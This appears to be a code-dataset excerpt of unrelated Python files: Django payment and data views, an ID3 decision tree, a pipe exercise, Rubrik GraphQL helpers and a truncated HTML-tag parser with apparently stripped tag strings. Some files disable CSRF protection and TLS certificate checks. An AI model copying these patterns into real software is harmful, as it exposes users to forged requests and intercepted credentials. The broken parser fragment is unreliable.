user_info[5] + ' ' + user_info[6]\n post_body['cus_email'] = user_info[3]\n post_body['cus_phone'] = user_info[1]\n post_body['cus_add1'] = \"customer address\"\n post_body['cus_city'] = \"Dhaka\"\n post_body['cus_country'] = \"Bangladesh\"\n post_body['shipping_method'] = \"NO\"\n post_body['multi_card_name'] = \"\"\n post_body['num_of_item'] = 1\n post_body['product_name'] = \"Test\"\n post_body['product_category'] = \"Test Category\"\n post_body['product_profile'] = \"general\"\n\n response = sslcz.createSession(post_body) # API response\n print(user_info)\n print(response)\n\n if(response['status'] == \"SUCCESS\"):\n print(response['sessionkey'], user_info[0], chosen_book[0][6], chosen_book[0][5], chosen_book[0][0])\n with connection.cursor() as cursor:\n cursor.execute(\"insert into rents (rent_taker_id, book_id, rent_date, rent_end_date) values (%s, %s, %s, %s);\", [user_info[0], chosen_book[0][0], rent_start, rent_end]),\n cursor.execute(\"insert into payment (t_id, paid_by, received_by, amount, book_id) values 
(%s, %s, %s, %s, %s);\", [response['sessionkey'], user_info[0], chosen_book[0][6], chosen_book[0][5], chosen_book[0][0]])\n \n with connection.cursor() as cursor:\n cursor.execute(\"select lp_number from delivery_man where provider_id is NULL order by rand() limit 1;\")\n lp_no = cursor.fetchone()\n\n with connection.cursor() as cursor:\n cursor.execute('select user.address from user inner join book where book.provider_id = user.nid and book.provider_id = %s;', [chosen_book[0][6]])\n address_provider = cursor.fetchone()\n\n with connection.cursor() as cursor:\n cursor.execute(\"UPDATE delivery_man SET provider_id = %s, provider_address = %s, recipient_address = %s, deliver_to_nid = %s WHERE delivery_man.lp_number = %s;\", [chosen_book[0][6], address_provider[0], user_info[2], user_info[0], lp_no[0]])\n\n print(response)\n return redirect(response['GatewayPageURL'])\n \n except:\n return render(request, 'user_reg/confirm_rent.html')\n \n@csrf_exempt\ndef confirmed(request):\n return render(request, \"user_reg/confirmed.html\")","repo_name":"Raahim-Rubaiyat-Teertho/Online_Library","sub_path":"library/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1947819341","text":"from django.conf import settings\nimport os\nimport os.path\nfrom django.shortcuts import render\nfrom django import template\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import loader\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt,csrf_protect\nimport json\nimport pandas as pd\nfrom IPython.display import HTML\n\nfrom .helpers import (\n CSVToDataFrame,\n MakeDataFrameJson, \n MakeModelCSV, \n ImportCSV, \n TableExportCSV,\n )\n\nmedia_dir = settings.MEDIA_ROOT \nstatic_dir = settings.STATIC_ROOT \n\n\n# training data used by the views below (train.csv assumed to sit alongside the other CSVs)\ntrain = pd.read_csv(f'{media_dir}/data/train.csv', parse_dates=['date'])\n\ntransactions = pd.read_csv(f'{media_dir}/data/transactions.csv', parse_dates=['date'])\n\noil = pd.read_csv(f'{media_dir}/data/oil.csv', parse_dates=['date'])\n\nholidays = pd.read_csv(f'{media_dir}/data/holidays_events.csv', parse_dates=['date'])\n\ntest = pd.read_csv(f'{media_dir}/data/test.csv', parse_dates=['date'])\n# In[ ]:\n\n\n# NO DATE COLUMN - 'index_col=0' (index/id column)\nstores = pd.read_csv(f'{media_dir}/data/stores.csv', index_col=0)\n\nsample = pd.read_csv(f'{media_dir}/data/sample_submission.csv', index_col=0)\n\n# LOAD DATAFRAMES\n\n####################################################################\n\n# LOAD CHART SVG\ndef BizView(request):\n\n # MONTHLY W/ FORECAST\n \n\n context = {\n\n }\n return render(request, 'biz/biz.html', context)\n\n@csrf_exempt\ndef LoadDataFrames(request):\n\n template = 'partials/tabbed_view_data.html'\n context = {\n 'train': train,\n 'transactions': transactions,\n 'oil': oil,\n 'holidays': holidays,\n 'stores': stores,\n\n 'test': test,\n 'sample': sample,\n }\n\n return render(request, template, context)\n\n\n@csrf_exempt\ndef LoadCharts(request):\n \n template = 'partials/tabbed_view_charts.html'\n context = {\n \n }\n\n return render(request, template, context)\n\n\n","repo_name":"Monxun/monxun-code","sub_path":"app/home/views/biz_view.py","file_name":"biz_view.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74536326546","text":"import math\r\nimport csv\r\n\r\n\r\ndef load_csv(filename):\r\n lines 
= csv.reader(open(filename, \"r\"))\r\n dataset = list(lines)\r\n headers = dataset.pop(0)\r\n return dataset, headers\r\n\r\n\r\nclass Node:\r\n def __init__(self, attribute):\r\n self.attribute = attribute\r\n self.children = []\r\n self.answer = \"\"\r\n\r\n\r\ndef subtables(data, col, delete): # col is basically a column header\r\n dic = {}\r\n coldata = [row[col] for row in data]\r\n\r\n attr = list(set(coldata)) # set returns only unique values in coldata\r\n counts = [0] * len(attr) # create empty list for every unique value\r\n r = len(data) # no of rows\r\n c = len(data[0]) # no of columns in each row\r\n for x in range(len(attr)): # no of unique values in the \"col\" column\r\n for y in range(r):\r\n if data[y][col] == attr[x]:\r\n counts[x] += 1\r\n for x in range(len(attr)):\r\n dic[attr[x]] = [[0 for i in range(c)] for j in range(counts[x])] # initializing the dictionary items\r\n pos = 0\r\n for y in range(r):\r\n if data[y][col] == attr[x]:\r\n if delete:\r\n del data[y][col] # removing that particular column (upper in the tree/parent)\r\n dic[attr[x]][pos] = data[y] # all rows for each unique value\r\n pos += 1\r\n return attr, dic # attr is a list, dic is a dict\r\n\r\n\r\ndef entropy(S):\r\n attr = list(set(S)) # S will basically have last column data (not necessarily of all rows)\r\n if len(attr) == 1:\r\n return 0 # if there is either only yes/ only no => entropy is 0\r\n counts = [0, 0]\r\n for i in range(2):\r\n counts[i] = sum([1 for x in S if attr[i] == x]) / (len(S) * 1.0) # find no of yes and no of no\r\n sums = 0\r\n for cnt in counts:\r\n sums += -1 * cnt * math.log(cnt, 2) # base 2 (second parameter)\r\n return sums\r\n\r\n\r\ndef compute_gain(data, col): # col is column-header\r\n attr, dic = subtables(data, col, delete=False) # here no deletion, we just calculate gain\r\n total_size = len(data) # |S| value in formula\r\n entropies = [0] * len(attr) # entropies of each value\r\n ratio = [0] * len(attr) # to maintain |Sv|/|S| values\r\n total_entropy = entropy([row[-1] for row in data])\r\n\r\n for x in range(len(attr)):\r\n ratio[x] = len(dic[attr[x]]) / (total_size * 1.0) # len of dic => |Sv| value\r\n entropies[x] = entropy([row[-1] for row in dic[attr[x]]])\r\n\r\n total_entropy -= ratio[x] * entropies[x] # according to the formula\r\n return total_entropy\r\n\r\n\r\ndef build_tree(data, features):\r\n lastcol = [row[-1] for row in data]\r\n if (len(set(lastcol))) == 1: # if last column contains either only \"yes\" or only \"no\"\r\n node = Node(\"\") # we are not building the tree further (so no attribute)\r\n node.answer = lastcol[0] # it'll be either yes/no\r\n return node\r\n n = len(data[0]) - 1 # -1 because we don't need the last column values\r\n gains = [0] * n # gain is initialized to be 0 for all attributes\r\n for col in range(n):\r\n gains[col] = compute_gain(data, col) # compute gain of each attribute\r\n\r\n split = gains.index(max(gains)) # split will have the index of attribute with \"highest gain\"\r\n node = Node(features[split]) # features list will have attribute headings (col names)\r\n # so now we create a subtree (node) with that particular attribute\r\n fea = features[:split] + features[split + 1:]\r\n attr, dic = subtables(data, split, delete=True) # attr will have possible values for that particular attribute\r\n # dic will have all rows for all those attributes (key: values)\r\n for x in range(len(attr)):\r\n child = build_tree(dic[attr[x]], fea) # for each value of the attribute\r\n node.children.append((attr[x], child)) # again build the tree (but fea excludes the one already taken)\r\n return node\r\n\r\n\r\ndef print_tree(node, level):\r\n if node.answer != \"\": # if it's a leaf node\r\n print(\" \" * level, node.answer) # just print \"level\" no of spaces, followed by answer (yes/no)\r\n return\r\n print(\" \" * level, node.attribute) # attribute in the node\r\n for value, n in node.children:\r\n print(\" \" * (level + 1), value)\r\n print_tree(n, level + 2) # recursive call to the next node (child)\r\n\r\n\r\ndef classify(node, x_test, features): # features: column headers\r\n if node.answer != \"\": # this will be true only for leaf nodes (answer: yes/no)\r\n print(node.answer)\r\n return\r\n pos = features.index(node.attribute) # node.attribute will have the col header\r\n for value, n in node.children: # for every value of that attribute\r\n if x_test[pos] == value: # for that particular value go along that value\r\n classify(n, x_test, features) # go deeper in the tree\r\n\r\n\r\ndataset, features = load_csv(\"traintennis.csv\")\r\n# lastcol=[row[-1] for row in dataset]\r\nnode1 = build_tree(dataset, features)\r\nprint(\"The decision tree for the dataset using ID3 algorithm is\")\r\nprint_tree(node1, 0)\r\n\r\ntestdata, features = load_csv(\"testtennis.csv\")\r\nfor xtest in testdata: # xtest is each row in testdata\r\n print(\"The test instance:\", xtest)\r\n print(\"The label for test instance:\", end=\" \")\r\n classify(node1, xtest, features)","repo_name":"Shubhamkumar-op/ml","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43089801130","text":"\"\"\" \nAuthor: GAÑÁN, Tomás \nAssignment 6: Multiprocessing\n\"\"\"\n# Importing libraries/modules\n\nimport signal\nimport os \nimport sys\nimport multiprocessing\n\ndef readPipe(pipe):\n while True:\n message = pipe.recv()\n print(\"\\n Reading (PID: %d): %s\" % (os.getpid(),message))\n\ndef readStdin(stdin):\n sys.stdin = os.fdopen(0)\n message = input(\"\\n Write a message: \")\n stdin.send(message)\n \ndef main():\n pipe, stdin = multiprocessing.Pipe()\n \n proc1 = multiprocessing.Process(target = readStdin, args = (stdin, ))\n proc2 = multiprocessing.Process(target = readPipe, args = (pipe, ))\n \n proc1.start()\n proc2.start()\n proc1.join()\n proc2.join()\n \nif __name__ == \"__main__\":\n main()","repo_name":"tomasganan/ComputacionII","sub_path":"Entrega6/ej9.py","file_name":"ej9.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33433812104","text":"\n\n# This file contains example python functions to connect to Rubrik Security Cloud\n# and execute RSC GraphQL queries to perform common Rubrik actions.\n# This is designed as a guidance system and can be customized to your individual needs.\n# This is a community project and is not supported by Rubrik\n# Author: Jeremy Cathey (Rubrik Platform Solutions Architect)\n# Date: 2023-04-10\n\nfrom RSCQueries import *\n\nimport json\nimport time\nimport requests\nfrom urllib3.exceptions import InsecureRequestWarning\n\n# Suppress the warnings from urllib3\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n\n\n\n\ndef rsc_connect(json_path):\n # Setup token auth\n json_file = open(json_path)\n json_key = json.load(json_file)\n json_file.close()\n session_url = json_key['access_token_uri']\n payload = {\n \"client_id\": json_key['client_id'],\n \"client_secret\": 
json_key['client_secret'],\n \"name\": json_key['name']\n }\n headers = {\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Accept': 'application/json, text/plain'\n }\n request = requests.post(session_url, json=payload, headers=headers, verify=False)\n del payload\n response_json = request.json()\n if 'access_token' not in response_json:\n print(\"Authentication failed!\")\n access_token = response_json['access_token']\n\n rscConnect = dict();\n # Setup token auth for direct graphql queries external to the SDK.\n rscConnect['URL'] = session_url.rsplit(\"/\", 1)[0]\n rscConnect['Token'] = access_token\n rscConnect['URI'] = session_url.rsplit(\"/\", 1)[0] + '/graphql'\n rscConnect['Headers'] = {\n 'Content-Type': 'application/json',\n 'Accept': 'application/json',\n 'Authorization': 'Bearer ' + access_token\n }\n print(\"Connected to RSC.\")\n\n return rscConnect\n\n\ndef rsc_execute_graphql_query(rsc_uri, rsc_headers, query, variables):\n # Execute graphQL query based off of passed variables query and variables.\n response = RSC_execute_graph_call(rsc_uri, rsc_headers, query, variables)\n return response\n\n\ndef rsc_livemount_managedvolume(rsc_uri, rsc_headers, mv_name):\n # function call to use the managed volume name to retrieve the managed volume id\n mv_id = RSC_FindManagedVolumeIDByName(rsc_uri, rsc_headers, mv_name)\n # function call to use the managed volume id to retrieve the latest snapshot id\n snapshot_id = RSC_Get_ManagedVolume_LatestSnapshotID(rsc_uri, rsc_headers, mv_id)\n # function call to check if the managed volume is already live mounted\n RSC_Get_ManagedVolume_LiveMountCount(rsc_uri, rsc_headers, mv_id)\n # function call to live mount the managed volume\n RSC_ExportManagedVolumeSnapshot(rsc_uri, rsc_headers, snapshot_id)\n # function call to retrieve the managed volume channel paths\n RSC_Get_ManagedVolume_ChannelPaths(rsc_uri, rsc_headers, mv_id)\n # function call to retrieve the id of the live mounted managed volume\n mv_livemount_id = RSC_Get_ManagedVolume_LiveMountID(rsc_uri, rsc_headers, mv_id)\n return mv_livemount_id\n\n\ndef rsc_unmount_managedvolume(rsc_uri, rsc_headers, mv_name):\n # function call to use the managed volume name to retrieve the managed volume id\n mv_id = RSC_FindManagedVolumeIDByName(rsc_uri, rsc_headers, mv_name)\n # function call to retrieve the id of the live mounted managed volume\n mv_livemount_id = RSC_Get_ManagedVolume_LiveMountID(rsc_uri, rsc_headers, mv_id)\n # function call to unmount the live mounted managed volume\n mv_unmount = RSC_DeleteManagedVolumeSnapshotExport(rsc_uri, rsc_headers, mv_livemount_id)\n return mv_unmount\n\n\ndef rsc_register_vms_bulk(rsc_uri, rsc_headers, vmcount):\n # Get list of vSphere virtual machines that are unregistered\n vm_id_list = RSC_Get_vSphere_VMs_Unregistered(rsc_uri, rsc_headers, vmcount)\n # Pass list of vSphere virtual machines IDs to be registered\n response = RSC_vSphere_RegisterVMs_Bulk(rsc_uri, rsc_headers, vm_id_list)\n return response\n\n\ndef rsc_register_vm(rsc_uri, rsc_headers, vm_name):\n # Call function to get vSphere VM ID from the VM name\n vm_id = RSC_Get_vSphere_VM_ID(rsc_uri, rsc_headers, vm_name)\n # Call function to register vSphere virtual machine\n response = RSC_vSphere_RegisterVM(rsc_uri, rsc_headers, vm_id)\n return response\n\n\ndef rsc_startThreatHunt(rsc_uri, rsc_headers, threathunt_name, cluster_uuid, object_fids, ioc_kind, ioc_value, utc_start, utc_end):\n # pass variables and start a threat hunt\n response = RSC_startThreatHunt(rsc_uri, rsc_headers, 
threathunt_name, cluster_uuid, object_fids, ioc_kind, ioc_value, utc_start, utc_end)\n return response\n\n","repo_name":"jeremycathey/Rubrik-pyGraphQL","sub_path":"RSCFunctions.py","file_name":"RSCFunctions.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73313150866","text":"\nfrom os import defpath, write\nfrom typing import Literal\nimport urllib\nfrom urllib.request import urlopen\ntry:\n from bs4 import BeautifulSoup\nexcept Exception:\n pass\n\n\"\"\"Globals\"\"\"\nbase_url = \"http://www.blankwebsite.com/\"\ngoogle_url = \"https://www.google.com\"\nglobal rowcounter\nrowcounter = 0\n\n\n\"\"\"Functions\"\"\"\n\ndef closedopentag(htmltag, htmllist: list, row): # html opening tags that are closed i.e <>\n data_tuple = [htmltag, False, '', row]\n htmllist.append(data_tuple)\n\ndef openopentag(htmltag, htmllist: list, line, row): # html opening tags that have attributes / parameters\n new_line = line.strip(htmltag)\n data_tuple = [htmltag, True, new_line, row]\n htmllist.append(data_tuple)\n\ndef closedtag(htmltag, htmllist: list, row):\n sub_list = [htmltag, row]\n htmllist.append(sub_list)\n\ndef checkingelements(textline, htmlelementlist: list): # function to check whether or not an element is a html element and to add the element to a dictionary if it is\n # if statements to determine whether or not to add the data in the dictionary\n html_all_tag_list = [\"\", \"
    \", \"\", \"
    \", \"
\", \"\", \"\", \"\", \"

\", \"\", \"\", \"\", \"\",\n \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\",\n \"\", \"\", \"\", \"\", \"\", \"\", \"\",\n \"\", \"\", \"\", \"\", \"\", \"\", \"\", \n \"\", \"\", \"\", \"\", \"\", \"\"] \n\n html_open_open_tag_list = [\"
\", \"
\", \"\", \"
\", \"